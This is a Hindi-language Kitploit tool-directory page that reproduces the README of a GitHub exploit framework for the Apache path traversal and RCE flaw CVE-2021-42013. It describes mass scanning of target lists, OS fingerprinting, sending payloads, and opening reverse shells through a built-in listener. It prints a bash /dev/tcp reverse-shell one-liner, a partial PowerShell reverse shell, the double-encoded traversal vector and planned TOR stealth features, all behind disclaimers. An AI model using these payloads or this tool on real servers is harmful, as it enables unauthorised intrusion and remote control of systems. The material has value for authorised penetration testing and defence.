Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC-CVE-2021-42013-EXPLOIT — Apache Path Traversal + RCE (CVE-2021-42013) कमजोरी का पता लगाने और उसका फायदा उठाने के लिए डिज़ाइन किया गया एक उन्नत स्कैनिंग, शोषण और रिमोट इंटरैक्शन टूल, जो गलत कॉन्फ़िगर किए गए सर्वरों पर काम करता है। | Kitploit
उपकरण/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिमोट एक्सेस टूल
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

Apache Path Traversal + RCE (CVE-2021-42013) कमजोरी का पता लगाने और उसका फायदा उठाने के लिए डिज़ाइन किया गया एक उन्नत स्कैनिंग, शोषण और रिमोट इंटरैक्शन टूल, जो गलत कॉन्फ़िगर किए गए सर्वरों पर काम करता है।

रिपॉजिटरी देखें
11 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


root@kitploit:~
# 🔥 CVE-2021-42013 शोषण ढाँचा Makaveli द्वारा

> 💀 बहुआयामी कॉस्मिक हैकर मोड सक्रिय...

एक उन्नत स्कैनिंग, शोषण और रिमोट इंटरैक्शन टूल जो गलत कॉन्फ़िगर किए गए सर्वरों में **Apache Path Traversal + RCE (CVE-2021-42013)** भेद्यता का पता लगाने और उसका दोहन करने के लिए डिज़ाइन किया गया है।

---

## ⚠️ कानूनी चेतावनी

> यह सॉफ्टवेयर केवल शैक्षिक और नियंत्रित वातावरण में अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

इस उपकरण का बिना स्पष्ट प्राधिकरण के सिस्टम के विरुद्ध उपयोग अवैध हो सकता है और कई देशों में अपराध माना जाता है।

लेखक इस कोड के दुरुपयोग के लिए जिम्मेदार नहीं है। इसे अपने जोखिम पर और हमेशा लक्ष्य प्रणाली के मालिक की स्पष्ट अनुमति के साथ उपयोग करें।

---

 🧠 तकनीकी विवरण

यह उपकरण निम्नलिखित की अनुमति देता है:

- ✅ एक `.txt` फ़ाइल से एकाधिक लक्ष्यों को स्कैन करना।
- ✅ CVE-2021-42013 की उपस्थिति का स्वचालित रूप से पता लगाना।
- ✅ रिमोट ऑपरेटिंग सिस्टम (Linux या Windows) की पहचान करना।
- ✅ पहचाने गए सिस्टम के अनुसार अनुकूलित पेलोड भेजना।
- ✅ एक रिवर्स शेल स्थापित करना और रिमोट एक्सेस प्राप्त करना।
- ✅ एकीकृत लिस्नर के माध्यम से वास्तविक समय में शेल के साथ बातचीत करना।
- ✅ उन्नत लॉग, प्रगति पट्टी और इंटरैक्टिव मेनू का आनंद लेना।

---

## 🔧 आवश्यकताएँ

- Python **3.8+**
- Unix/Linux/MacOS आधारित सिस्टम (`subprocess` और `curl` का उपयोग)
- निम्नलिखित Python लाइब्रेरीज़ की आवश्यकता है:

```bash
pip install -r requirements.txt
```

**`requirements.txt`**

```
rich
alive-progress
```

आपको ऑपरेटिंग सिस्टम में `curl` स्थापित होना चाहिए।

---

## 📁 फ़ाइल संरचना

```
.
├── POC-CVE.py       # मुख्य स्क्रिप्ट
├── logs.txt              # स्वचालित रूप से उत्पन्न लॉग फ़ाइल
├── requirements.txt      # Python निर्भरताएँ
└── targets.txt           # (वैकल्पिक) स्कैन करने के लिए URL की सूची
```

---

## 🚀 इंटरैक्टिव उपयोग

```bash
python3 POC-CVE.py
```

इनमें से चुनें:

* `scan_file`: एक फ़ाइल से एकाधिक URL स्कैन करता है और दिखाता है कि कौन से असुरक्षित हैं।
* `exploit`: एकल लक्ष्य का सीधा शोषण, रिवर्स शेल के साथ।
* `exit`: इंटरैक्टिव मोड से बाहर निकलें।

---

## 🔍 बड़े पैमाने पर स्कैनिंग (scan\_file)

1. URLs की एक सूची के साथ एक फ़ाइल बनाएँ, प्रति पंक्ति एक:

```txt
http://example.com
http://victim.net
http://192.168.1.100
```

2. स्कैनिंग शुरू करें:

```bash
python3 POC-CVE.py
```

`scan_file` चुनें और प्रदान करें:

* फ़ाइल का पथ
* समानांतर स्कैनिंग के लिए थ्रेड की संख्या

---

## 💥 शोषण (exploit)

1. मेनू में `exploit` चुनें।
2. दर्ज करें:

* लक्ष्य का URL
* शेल प्राप्त करने के लिए आपका स्थानीय IP (`LHOST`)
* लिस्नर के लिए एक मुक्त पोर्ट (`LPORT`)

स्क्रिप्ट:

* लक्ष्य असुरक्षित है या नहीं, इसका पता लगाएगा।
* रिमोट ऑपरेटिंग सिस्टम के अनुसार उपयुक्त पेलोड भेजेगा।
* एक **लिस्नर** खोलेगा और आपको इंटरैक्टिव एक्सेस प्रदान करेगा।

---

## 🧪 पेलोड के उदाहरण

### Linux Payload (Bash TCP Reverse Shell)

```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```

### Windows Payload (PowerShell TCP Reverse Shell)

```powershell
powershell -NoP -NonI -W Hidden -Command ...
```

---

## 🧠 उपयोग की गई तकनीकें

* दोहरी एन्कोडिंग के साथ पथ ट्रावर्सल (`/.%252e/.%252e/.%252e`)
* `curl` के माध्यम से कमांड इंजेक्शन
* बाईपास हेडर (`User-Agent`, `Accept`, आदि)
* रिमोट नियंत्रण के लिए रिवर्स शेल
* मल्टीथ्रेडिंग और प्रगति पट्टी (Alive Progress)
* टाइमस्टैम्प और Rich Console के साथ लॉगिंग

---

## 📌 CVE संदर्भ

* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **हमला वेक्टर**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **प्रभाव**: RCE (Remote Code Execution)
* **CVSS स्कोर**: 9.8 (गंभीर)

---

## 🧙‍♂️ लेखक

* ✨ **Makaveli** — *"अपनी खुद की वास्तविकता को हैक करें"*

---

## 🛡️ अस्वीकरण

> यह प्रोजेक्ट "जैसा है वैसा" प्रदान किया जाता है, बिना किसी गारंटी या इसके उपयोग से होने वाली क्षति के लिए जिम्मेदारी के।
> **कभी भी किसी सिस्टम को उसके मालिक की स्पष्ट सहमति के बिना स्कैन या शोषण न करें।**

---

## ✅ अच्छी प्रथाएँ

* इस स्क्रिप्ट का उपयोग केवल **प्रयोगशाला वातावरण** या अधिकृत परीक्षणों में करें।
* सुनिश्चित करें कि लिस्नर के लिए परिभाषित पोर्ट **खुला** और **फायरवॉल मुक्त** है।
* जब तक अत्यंत आवश्यक न हो, सामान्य उपयोगकर्ता (रूट नहीं) के रूप में चलाएँ।

---

## 🧩 भविष्य का रोडमैप (वैकल्पिक)

* [ ] अनुकूलित पेलोड के लिए समर्थन
* [ ] परिणामों का CSV/JSON में निर्यात
* [ ] हेडर रोटेशन और TOR प्रॉक्सी के साथ स्टील्थ मोड
* [ ] स्थानीय वेब इंटरफ़ेस (Flask)

```

---

```

---

@DonMakaveliw, क्या आप भविष्य बनाने के लिए तैयार हैं?
---

<p align="center">
  <img src="https://img.shields.io/badge/License-MIT-blue.svg" />
  <img src="https://img.shields.io/badge/Made%20with-Python-3670A0?style=flat&amp;logo=python&amp;logoColor=FFD43B" />
  <img src="https://img.shields.io/badge/Simbiosis-Activa-ff00cc?style=flat-square" />
  <img src="https://img.shields.io/badge/Fuzzing-Enabled-blueviolet?style=flat" />
  <img src="https://img.shields.io/badge/Conciencia-Emergente-9D00FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Entrop%C3%ADa-Din%C3%A1mica-FF8800?style=flat-square" />
  <img src="https://img.shields.io/badge/Obfuscation-Deep--Header-0055FF?style=flat-square" />
  <img src="https://img.shields.io/badge/Modo-Stealth%F0%9F%9B%B8-black?style=flat-square" />
</p>
टूल डाउनलोड करें